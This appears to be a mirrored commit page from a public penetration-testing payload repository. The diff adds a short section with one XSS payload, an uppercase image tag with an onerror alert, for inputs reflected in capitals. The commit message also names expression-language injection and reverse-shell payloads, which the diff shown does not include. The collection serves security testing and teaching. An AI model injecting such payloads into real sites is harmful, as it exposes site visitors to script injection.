mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-12-12 07:40:34 -08:00
Expression Language Injection One-Liners; XSS Payload; Fixed Linux Python IPv6 Reverse Shell Payload
This commit is contained in:
@@ -230,6 +230,12 @@ e.g: 14.rs/#alert(document.domain)
|
||||
Use CTRL+SHIFT+X to trigger the onclick event
|
||||
```
|
||||
|
||||
### XSS when payload is reflected capitalized
|
||||
|
||||
```javascript
|
||||
<IMG SRC=1 ONERROR=alert(1)>
|
||||
```
|
||||
|
||||
### DOM based XSS
|
||||
|
||||
Based on a DOM XSS sink.
|
||||
|
||||
Reference in New Issue
Block a user